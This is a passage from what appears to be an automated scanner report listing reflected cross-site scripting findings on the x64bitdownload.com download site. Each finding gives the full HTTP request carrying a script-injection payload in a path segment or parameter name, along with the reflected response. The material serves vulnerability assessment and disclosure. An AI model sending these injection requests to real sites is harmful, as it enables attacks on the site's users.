Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77035


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1" />
...[SNIP]...

4.1659. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40541"><script>alert(1)</script>0a50b7a4e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html" />
...[SNIP]...

4.1660. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597b7"><script>alert(1)</script>5a1bd81061d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d" />
...[SNIP]...

4.1661. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6254b"><script>alert(1)</script>08a105a460f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1" />
...[SNIP]...

4.1662. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38933"><script>alert(1)</script>a091c5ce1f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html" />
...[SNIP]...

4.1663. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880f5"><script>alert(1)</script>ffef72251bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb" />
...[SNIP]...

4.1664. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afba"><script>alert(1)</script>952a07404a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1" />
...[SNIP]...

4.1665. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8db"><script>alert(1)</script>a8017a7f1a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html" />
...[SNIP]...

4.1666. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e91c"><script>alert(1)</script>e48652f16c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2" />
...[SNIP]...

4.1667. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5836"><script>alert(1)</script>5c1d810d2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1" />
...[SNIP]...

4.1668. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>294861f4a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html" />
...[SNIP]...

4.1669. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2500"><script>alert(1)</script>7d8844f103c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81971


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c" />
...[SNIP]...

4.1670. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7af"><script>alert(1)</script>b1ff1afa51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1" />
...[SNIP]...

4.1671. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25cff"><script>alert(1)</script>55fd3605a8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html" />
...[SNIP]...

4.1672. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7de5"><script>alert(1)</script>3c381f515e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3" />
...[SNIP]...

4.1673. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3aea"><script>alert(1)</script>baafb6db136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
